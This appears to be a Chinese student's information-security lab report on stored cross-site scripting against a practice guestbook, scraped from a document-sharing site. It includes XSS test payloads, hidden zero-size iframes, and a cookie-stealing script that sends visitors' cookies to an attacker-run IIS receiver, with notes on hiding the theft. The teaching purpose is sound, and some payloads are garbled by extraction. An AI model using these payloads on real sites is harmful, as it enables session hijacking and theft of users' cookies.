信息安全导论实验2.docxVIP

  1. 1、本文档共13页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
信息安全概论课程实验报告 实验二 实验目的 1)深入理解跨站脚本攻击概念; 2)掌握形成跨站脚本漏洞的条件; 3)掌握对跨站脚本的几种利用方式。 实验内容及实现 预备任务:熟悉留言系统 ????? 在预备任务中,我们将安装在目标主机上的跨站脚本攻击演练平台(留言系统)。 ????? 1、使用远程桌面登录至练习主机。 ????? 2、使用浏览器打开页面,进入跨站脚本攻击演练平台,如下图所示: ? ????? 3、给留言系统添加留言,熟悉本系统环境。 ????? 4、管理留言。 ????? 点击“管理留言”,用户名:admin,密码:admin123,可以对刚留言进行管理。 任务一:存储式跨站脚本测试 ????? 实验内容:初步测试留言系统是否存在存储式跨站漏洞; ????? 实验步骤: ????? 1、登录到实验机上,用IE浏览器中打开留言系统()。 ????? 2、在留言内容中填写包含有跨站测试的脚本,提交后观察返回效果。 ???????? scriptalert(XSS TEST)/script ????? 3、刷新留言系统,如果新加留言显示如下,则说明系统有存储式跨站漏洞。 ????? 4、思考: ????? 测试当其他用户打开这个页面时,嵌入的代码是否会执行?分析留言系统代码,为什么填写的留言脚本会被执行? 答:代码会执行,因为我查看了这个网页的源代码,发现留言被直接插入到html代码中,我们在留言中写入脚本,相当于在网页中注入脚本,每次访问都会执行写入的脚本,即alert操作。 任务二:存储式跨站漏洞的简单利用 ????? 实验内容:使用跨站漏洞加载恶意网页。 ????? 实验步骤: ????? 清空实验一任务,将恶意网页(假设)放入留言系统数据库,并在用户端执行; ????? 1、增加一留言,并在留言内容中改为 iframe src=/iframe,测试返回效果。 ????? 2、隐藏恶意网页。增加留言,内容包含以下语句:iframe src= width=0 height=0/iframe,观察返回状态,并解释原因。 答:隐藏起来是因为在插入脚本时,人为设定其高度宽度均为0,表面上看不出来,实际已经插入了。(这可以隐藏攻击者的踪迹)。 ????? 3、思考本留言系统是否有其他利用方式? 答:因为是脚本式写入,所以可以有很多利用方式,比如写一个攻击脚本,攻击这个网站,还可以使他成为挂马网站。 实验任务三:利用存储式跨站漏洞窃取用户cookie ??????实验内容:利用存储式跨站漏洞窃取用户cookie ??????实验步骤: ?????1、继续添加留言,包含以下内容:scriptdocument.write(document.cookie)/script ????? 结果如图所示: ? ? ? ??2、继续添加留言,包含以下内容: ????? scriptalert(document.cookie)/script,比较有什么区别? 答:第一种是将cookie以留言的方式展示出来,第二种是以弹出命令框的方式展示cookie。 ?????? 3、使用管理员登录,观察显示的cookie有什么不同? ? ????? 4、思考:这种窃取cookie的方式有什么缺点?有什么方法可以将用户的cookie窃取出并保存下来,而且用户看不到? 答:被攻击的用户会发现自己处于被攻击状态,攻击行为容易暴露。 像之前一样,将要显示内容的宽度和高度设置为0,就可以达到隐藏攻击的目的。 ????? 5、在攻击机上使用提供的页面搭建WEB服务器,以便保存浏览用户的cookie。搭建IIS服务器过程中应注意如下几点: 在Web服务扩展中允许Active Server Pages服务 ?? 2)默认网站-属性-文档中添加index.asp内容页。 ? 3)在:C:\tools\跨站脚本攻击\中的cookies文件夹属性-安全-组或用户名称(G)-添加-高级-立即查找中找到IUSR_BJHIT-YXI7NEFU8用户,选择并确定 ? 4)给IUSR_BJHIT-YXI7NEFU8用户写入权限 ??? 搭建好后,在浏览器中输入本机IP地址进行测试,如下图所示: ????? 返回页面,继续添加留言,包含以下内容: ???? scriptdocument.write(iframe width=0 height=0 src=8/cookie.asp?cookie=+document.cookie+/iframe);/script ????? 提交留言后观察目标服务器页面,没有看到异常现象。 ????? 再打开本地页面,查看接收浏览用户的cookie接收情况: ????? 可以看到,已经接收到用户的cookie了,这些cookie包含了所有浏览该页面的信息,

您可能关注的文档

文档评论(0)

t_github + 关注
实名认证
文档贡献者

计算机研究者

1亿VIP精品文档

相关文档